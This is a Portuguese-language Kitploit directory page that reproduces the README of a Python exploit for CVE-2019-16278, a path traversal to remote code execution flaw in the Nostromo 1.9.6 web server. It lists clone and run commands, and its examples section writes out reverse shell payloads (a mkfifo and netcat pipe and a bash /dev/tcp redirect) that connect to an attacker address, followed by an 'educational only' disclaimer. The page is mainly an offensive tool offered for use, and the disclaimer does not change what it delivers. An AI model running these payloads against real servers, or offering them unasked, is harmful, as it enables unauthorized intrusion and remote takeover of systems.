Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution — Um atacante não autenticado pode forçar pontos do servidor para um arquivo shell como '/bin/sh' e executar comandos arbitrários devido à falha na verificação da URL que leva a path traversal para qualquer arquivo que exista no sistema. Versões do Nostromo como 1.9.6 falham em verificar esta URL | Kitploit
Ferramentas/GitHubGitHub/cybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubcybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution

CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Ver Repositório
4há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Um atacante não autenticado pode forçar pontos do servidor para um arquivo shell como '/bin/sh' e executar comandos arbitrários devido à falha na verificação da URL que leva a path traversal para qualquer arquivo que exista no sistema. Versões do Nostromo como 1.9.6 falham em verificar esta URL

Compartilhar

POC

Repositório: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git

📜 Descrição

Este repositório contém um exploit em Python para CVE-2019-16278, uma vulnerabilidade no Nostromo 1.9.6 (um servidor web). A vulnerabilidade permite Execução Remota de Código (RCE) ao explorar um traversal de diretório para executar comandos arbitrários no sistema alvo.

🚀 Funcionalidades

  • Executar comandos shell personalizados no alvo vulnerável.
  • Suporte para payloads de reverse shell.
  • Capacidade de personalizar o tamanho da resposta do alvo.

🛠️ Requisitos

  • Python 3.x
  • Uma máquina executando Nostromo 1.9.6 (o alvo vulnerável).
  • Netcat (nc) para capturar reverse shells.

⚙️ Uso

Passo 1: Clonar o Repositório

git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Passo 2: Executar o Exploit

python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]

Argumentos:

ArgumentoDescriçãoObrigatórioPadrão
-t, --targetO endereço IP do alvoSimNenhum
-p, --portA porta do alvoSimNenhum
-c, --commandO comando a executar no servidorSimNenhum
-b, --bytesNúmero de bytes a ler na respostaNão4096

🧑‍💻 Exemplos

Exemplo 1: Executar whoami no Alvo

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

Exemplo 2: Reverse Shell com Netcat

Passo 1: Inicie um listener Netcat na sua máquina atacante:

nc -lvnp 443

Passo 2: Execute o exploit com um payload de reverse shell:

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

Exemplo 3: Reverse Shell usando /dev/tcp

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 Detalhes da Vulnerabilidade

  • CVE: CVE-2019-16278
  • Software Afetado: Servidor Web Nostromo 1.9.6
  • Tipo: Travessia de Diretório -> Execução Remota de Código

⚠️ Aviso

Esta ferramenta é destinada apenas para fins educacionais. Não a utilize em sistemas que você não possui ou sem permissão explícita para testar. O acesso não autorizado a sistemas é ilegal. Use com responsabilidade.

Baixar ferramenta